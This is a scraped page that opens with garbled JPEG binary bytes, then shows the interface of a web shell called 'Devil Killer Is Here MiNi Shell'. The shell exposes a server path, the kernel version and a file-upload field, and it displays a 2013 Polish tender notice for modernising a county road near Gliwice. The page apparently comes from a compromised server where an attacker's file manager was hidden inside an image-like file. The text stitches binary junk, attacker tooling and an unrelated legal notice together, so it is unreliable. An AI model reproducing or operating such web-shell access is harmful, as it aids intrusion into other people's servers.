JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130304/33463-N-2013.html

<p class="kh_header"><b>Gliwice: Modernizacja drogi powiatowej Nr 2916S Żernica - Smolnica</b><br>
<b>Numer ogłoszenia: 33463 - 2013; data zamieszczenia: 04.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Zygmunta Starego 17, 44-100 Gliwice, woj. śląskie, tel. 032 2340696, faks 032 2340696.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdpgliwice.pzd.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja drogi powiatowej Nr 2916S Żernica - Smolnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia jest wykonanie -  zgodnie z opracowaną dokumentacją techniczną,  specyfikacją techniczną wykonania i odbioru robót oraz przedmiarem robót modernizacji drogi powiatowej Nr 2916S Żernica - Smolnica od km 4+637 do 5+500. 
W ramach zadania planowana jest przebudowa drogi powiatowej wraz z wymianą podbudowy na odcinku o dł. 863 mb . Początek zadania będzie na skrzyżowaniu z drogą powiatową Nr 2926S                ul. Górnicza w Żernicy (Gmina Pilchowice - km 4+637) a koniec w km 5+500 jadąc w kierunku Smolnicy  . Ze względu na niską nośność nawierzchni i jej niejednorodność wykonana zostanie  nowa konstrukcja od podstaw z dostosowaniem do KR 4 - klasa drogi  G . Po przebudowie droga posiadać będzie następujące parametry techniczne: szerokość jezdni- 6,0 m , szerokość  poboczy : 1,0-1,5 m, spadek poprzeczny jezdni daszkowy-2,0%, odwodnienie powierzchniowe rowami przydrożnymi , konstrukcja jezdni o nacisku na oś 115 kN.  Ponadto w ramach zadania  planowana jest przebudowa  przepustów pod zjazdami na pola i do lasu oraz wykonanie nowych przepustów w  miejscach ich braku , utwardzenie nawierzchni na wjazdach ( nawierzchnie z mieszanek mineralno- bitumicznych) , wykonanie murków czołowych betonowych w miejscu występowania przepustów pod drogami  oraz  utwardzenie poboczy żużlem wielkopiecowym oraz materiałem pofrezowym                        o szerokości: pobocze prawe: 1,5 m , pobocze lewe: 1,0 m .

2)	Zakres robót: 
 
a)	frezowanie mechaniczne nawierzchni bitumicznej o średniej grubości 15 cm - 5178 m2 
b)	rozebranie podbudowy z kruszywa o gr.20 cm mechanicznie  - 5178 m2
c)	podbudowa pomocnicza z żużla wielkopiecowego lub kruszywa naturalnego na jezdniach rozściełana mechanicznie, gr. warstwy po zagęszczeniu 20 cm - 5644,02 m2   
d)	wykonanie podbudowy z mieszanek bitumicznych dla ruchu KR-4 o grubości warstwy 7 cm  po zagęszczeniu  - 5471,42 m2 
e)	wykonanie podbudowy na poboczach z kruszywa uzyskanego z rozbiórki istniejącej podbudowy grubości 15 cm-  ręcznie - 2157,50 m2
f)	wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowych asfaltowych, warstwa wiążąca dla ruchu KR-4 o gr.6 cm po zagęszczeniu - 5316,08 m2       
g)	 wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowych asfaltowych, warstwa ścieralna dla ruchu KR-4 o gr.5 cm  po zagęszczeniu  - 5178,00 m2   
h)	 wykonanie nawierzchni poboczy z materiału uzyskanego z frezowania nawierzchni bitumicznej o gr.10 cm po zagęszczeniu - 2157,50 m2 
i)	 wykonanie murków czołowych przepustów wraz z budową fundamentów,  fundamentów betonowych pod ścianki czołowe przepustów rurowych oraz elementów przepustów rurowych
j)	 wykonanie  oznakowania pionowego i poziomego
k)	 wykonanie tymczasowej organizacji ruchu na czas prowadzenia robót wg zatwierdzonego projektu organizacji ruchu
l)	wykonanie inwentaryzacji geodezyjnej powykonawczej z naniesieniem na zasoby geodezyjne 
3) 	Zamawiający wymaga udzielenia 84-miesięcznej gwarancji na wykonane roboty.
4) Zamówienie współfinansowane z Programu Wieloletniego pod nazwą: 
NARODOWY PROGRAM PRZEBUDOWY DRÓG LOKALNYCH - ETAP II 
BEZPIECZEŃSTWO- DOSTĘPNOŚĆ- ROZWÓJ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust.1 pkt 6 ustawy Pzp polegających na powtórzeniu tego samego rodzaju robót.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.22-1, 45.10.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 30 000,00 zł (słownie: trzydzieści tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w okresie 5 lat przed dniem upływu terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, wykonał co najmniej 2 roboty budowlane polegające na budowie, przebudowie lub remoncie drogi co najmniej powiatowej, klasy co najmniej G i o łącznej wartości co najmniej 1 600 000,00 zł wraz z załączeniem dokumentów potwierdzających,  że zamówienie zostało wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
W przypadku podmiotów działających wspólnie powyższy warunek musi spełniać 1 podmiot lub  wszystkie podmioty łącznie. 

Ocena spełnienia wyżej wymienionego warunku dokonana zostanie w oparciu o informacje  zawarte w załączonych dokumentach na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel tj.:
kierownika budowy posiadającego:
-	uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń                             w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, lub odpowiednich przepisów obowiązujących na terenie kraju z którego pochodzi osoba, które w zakresie objętym zamówieniem pozwalać będą na pełnienie samodzielnych funkcji technicznych w budownictwie w ww. specjalności
-	wyższe wykształcenie,
-	co najmniej 3 letni staż pracy
-	praca na stanowisku kierownika budowy lub kierownika robót na co najmniej jednym zadaniu polegającym na budowie, przebudowie lub remoncie drogi o długości min.                           800 mb,   
W przypadku podmiotów działających wspólnie powyższy warunek musi spełnić  jeden podmiot lub wszystkie podmioty łącznie.
Ocena spełnienia wyżej wymienionego warunku dokonana zostanie w oparciu o informacje  zawarte w załączonych dokumentach na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W związku z niedostosowaniem formularza ogłoszenia do znowelizowanej ustawy Prawo zamówień publicznych i przepisów wykonawczych, poniżej przedstawiono wykaz dokumentów, który należy załączyć do oferty:
1)	Dokumenty, jakie należy złożyć w celu potwierdzenia spełniania warunków udziału w postępowaniu:

a)	oświadczenie o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ustawy  Pzp      ( o treści załącznika nr 1 do formularza ofertowego)
b)	wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania (o treści załącznika nr 3 do formularza ofertowego) oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (referencje, protokoły zdawczo odbiorcze etc).
c)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (o treści załącznika nr 4 do formularza ofertowego)
d)	oświadczenie złożone poprzez wypełnienie załącznika nr 4 do formularza ofertowego potwierdzające, że osoba/-y, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

2)	Dokumenty, jakie należy złożyć w celu potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp:
a)	oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Pzp ( o treści załącznika nr 2 do formularza ofertowego);
b)	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
c)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
d)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty o których mowa w pkt. 2) dla każdego z nich.
Wykonawca powołujący się przy wykazaniu spełnienia warunków udziału w postępowaniu na wiedzę i doświadczenie oraz potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty określone powyżej dotyczące tego podmiotu.
3)	Dokumenty składane przez wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
a)	jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej  Polskiej, zamiast:
- aktualnego odpisu z właściwego rejestru, 
- aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu
składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż        6 miesięcy przed upływem terminu  składania ofert
- nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
4)	   Dokumenty dotyczące przynależności do tej samej grupy kapitałowej:
a)	Lista podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz 331 z póź, zm.) o której mowa w art. 24 ust 2 pkt. 5 ustawy Pzp albo informację o tym, że Wykonawca nie należy do grupy kapitałowej (zgodnie z załącznikiem nr 5)
5)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia z następującym zastrzeżeniem:
a)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia;
b)	zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo  reprezentowania w postępowaniu i zawarciu umowy;
c)	pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej; fakt ustanowienia pełnomocnika musi wynikać z załączonych do oferty dokumentów.

6)	  Inne dokumenty: 
a)	 pełnomocnictwo, o ile oferta jest składana przez osobę, która nie jest uprawniona do reprezentowania wykonawcy;
b)	pisemne zobowiązanie podmiotów trzecich do oddania zamawiającemu do jego dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia  złożone                 w oryginale.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień zawartej umowy oraz warunki dokonania zmian
I. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w niżej wymienionych przypadkach:
1.	ZMIANY OGÓLNE 
     A Możliwa jest:
a)	zmiana adresu/siedziby Zamawiającego/Wykonawcy,
b)	zmiana osób występujących po stronie Zamawiającego/Wykonawcy,
c)	zmiana w kolejności i terminach wykonywania robót,
d)	zmiana będąca skutkiem poprawy oczywistej omyłki.
     B Nie jest dopuszczalna zmiana Wykonawcy, z wyjątkiem sukcesji generalnej, przekształcenia, dziedziczenia spółek handlowych zgodnie z ksh, sukcesji z mocy prawa. 
     C Możliwa jest zmiana zakresu robót w przypadku protestów mieszkańców.
2.	ZMIANY RZUTUJĄCE NA TERMIN WYKONANIA UMOWY
A.	Możliwe jest przedłużenie terminu zakończenia umowy o czas opóźnienia, jeśli opóźnienie to wynika z przyczyn leżących po stronie Zamawiającego i jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy, w zakresie następujących obowiązków Zamawiającego:
a)	przekazanie terenu budowy,
b)	przekazanie dokumentów budowy.
B.	Możliwa jest zmiana terminu wykonania umowy, ewentualnie wstrzymanie/wznowienie robót, ze względu na:
a)	oczekiwanie Wykonawcy na niezbędne opinie, decyzje administracyjne (opóźnienie spowodowane przez władze),
b)	przedłużenie procedury przetargowej,
c)	uwarunkowania społeczne (protesty, listy, petycje, itp.),
d)	konieczność prowadzenia uzgodnień z właścicielami urządzeń obcych lub właścicielami nieruchomości,
e)	roboty dodatkowe,
f)	technologię wykonywania robót,
g)	zmiany stanu prawnego,
h)	warunki geotechniczne, których nie można było przewidzieć,
i)	niesprzyjające warunki atmosferyczne,
j)	wykopaliska uniemożliwiające wykonywanie robót, 
k)	działania sił natury, uznanych za stan klęski żywiołowej, 
l)	rezygnację z części robót.
C.	Wykonawca nie będzie miał prawa do przedłużenia terminu zakończenia umowy jeśli przedłużenie terminu wynika z przyczyn leżących po stronie Wykonawcy.
3.	ZMIANY RZUTUJĄCE NA WYNAGRODZENIE 
      Możliwa jest zmiana postanowień umowy w związku:
a)	ze zmianą stawki podatku od towarów i usług (VAT),
b)	z obniżeniem kosztu wykonania robót a tym samym wynagrodzenia Wykonawcy,
c)	z rezygnacją z części robót.
II. Określa się następujący tryb dokonywania zmian postanowień umowy:
1.	Sposób inicjowania zmian:
A.	Zamawiający:
a)	wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany,
b)	wnioskuje, aby Wykonawca przedłożył propozycję zmiany.
B.	Osoby występujące po stronie Zamawiającego:
a)    wnioskują do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany.
C.	Wykonawca:
a)    wnioskuje do Zamawiającego o dokonanie wskazanej zmiany.
2.	Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo wykonawcy, protokół konieczności, itp.). Protokół konieczności wymaga zatwierdzenia Kierownika Zamawiającego.
3.	W rezultacie dokonania czynności opisanych w punkcie 1 i punkcie 2 może dojść do podpisania przez strony aneksu do umowy. Projekt aneksu przygotuje Zamawiający.
4.	W przypadku konieczności zaniechania części zakresu Przedmiotu Umowy Wynagrodzenie Wykonawcy ulegnie odpowiednio zmniejszeniu. Stosowne zmiany do Umowy zostaną wprowadzone aneksem do Umowy (zwanym dalej Aneksem)podpisanym przez obie strony oraz znajdą odzwierciedlenie w Zamiennym  Harmonogramie, który po zaakceptowaniu przez Zamawiającego będzie stanowił załącznik do ww. Aneksu.
5.	Podstawą określenia Wynagrodzenia za zaniechany zakres robót będzie protokół konieczności uzgodniony przez Strony oraz kosztorys sporządzony przez Wykonawcę metodą kalkulacji szczegółowej, zawierający pozycje dla robót zaniechanych z kosztorysu ofertowego Wykonawcy. W przypadku, gdy zaniechany zakres robót wynikających z Projektu nie został uwzględniony przez Wykonawcę w pozycjach kosztorysu ofertowego ilość jednostek przedmiarowych zakresu robót podlegającego zaniechaniu zostanie określona na podstawie przedmiaru sporządzonego w oparciu o Projekt. Wynagrodzenie za zaniechany zakres robót zostanie określone na podstawie kosztorysu szczegółowego sporządzonego w oparciu o ww. przedmiar z uwzględnieniem nw. danych wyjściowych do kosztorysowania określonych poniżej:
a)	stawka r-g, wskaźnik kosztów pośrednich i zysku - będą tożsame z wielkością tych składników cenowych zawartych w formularzu oferty,
b)	ceny materiałów - według średnich cen opublikowanych w kwartalnej Informacji cenowej o cenach materiałów budowlanych, elektrycznych i instalacyjnych (IMB; IME i IMI) SEKOCENBUD, obowiązujących w okresie sporządzania oferty i zawierających ceny zakupu, a w przypadku ich braku według cen udokumentowanych i uzgodnionych z Zamawiającym,
c)	ceny sprzętu - według średnich cen opublikowanych w kwartalnej Informacji cenowej o cenach pracy sprzętu (IRS) SEKOCENBUD, obowiązujących w okresie sporządzania oferty, a w przypadku ich braku według cen udokumentowanych i uzgodnionych z Zamawiającym.
Tak sporządzony kosztorys, po uprzednim jego sprawdzeniu i zatwierdzeniu przez Zamawiającego, będzie stanowił podstawę zmiany Wynagrodzenia Wykonawcy.

6.	W przypadku wystąpienia robót zamiennych Wynagrodzenie Wykonawcy ulegnie odpowiednio zmianie. Stosowne zmiany do Umowy zostaną wprowadzone Aneksem do Umowy podpisanym przez obie strony oraz znajdą odzwierciedlenie w Zamiennym Harmonogramie, który po zaakceptowaniu przez Zamawiającego będzie stanowił załącznik do ww. Aneksu. Podstawą określenia wynagrodzenia za roboty zamienne będzie protokół konieczności uzgodniony przez Strony oraz kosztorys różnicowy sporządzony przez Wykonawcę metodą kalkulacji szczegółowej, zawierający pozycje dla zakresu robót według technologii przyjętej w kosztorysie ofertowym stanowiącym podstawę obliczenia ceny w ofercie oraz pozycje dla zakresu robót podlegających wykonaniu według nowej technologii, z uwzględnieniem nw. danych wyjściowych do kosztorysowania określonych poniżej:
a)	a. stawka r-g, wskaźnik kosztów pośrednich i zysku - będą tożsame z wielkością tych składników cenowych zawartych w formularzu oferty,
b)	b. ceny materiałów - według średnich cen opublikowanych w kwartalnej Informacji cenowej o cenach materiałów budowlanych, elektrycznych i instalacyjnych (IMB; IME i IMI) SEKOCENBUD, obowiązujących w danym okresie i zawierających ceny zakupu, a w przypadku ich braku według cen udokumentowanych i uzgodnionych z Zamawiającym, 
c)	c. ceny sprzętu - według średnich cen opublikowanych w kwartalnej Informacji cenowej o cenach pracy sprzętu (IRS) SEKOCENBUD, obowiązujących w danym okresie, a w przypadku ich braku według cen udokumentowanych i uzgodnionych z Zamawiającym.
d)	W przypadku, jeśli wynikający z dokumentacji zakres robót podlegających zamianie nie został uwzględniony przez Wykonawcę w pozycjach kosztorysu ofertowego, ilość jednostek przedmiarowych zakresu robót podlegającego zamianie zostanie określona na podstawie przedmiaru sporządzonego w oparciu o Projekt. Wynagrodzenie za ten zakres robót zostanie obliczone odpowiednio w sposób określony w punkcie 5.
Tak sporządzony kosztorys różnicowy po uprzednim jego sprawdzeniu i zatwierdzeniu przez Zamawiającego, będzie stanowił podstawę zmiany Wynagrodzenia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdpgliwice.pzd.net.pl<br>
